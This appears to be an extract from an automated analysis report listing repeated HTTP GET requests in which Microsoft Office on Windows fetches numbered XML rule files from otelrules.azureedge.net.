Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
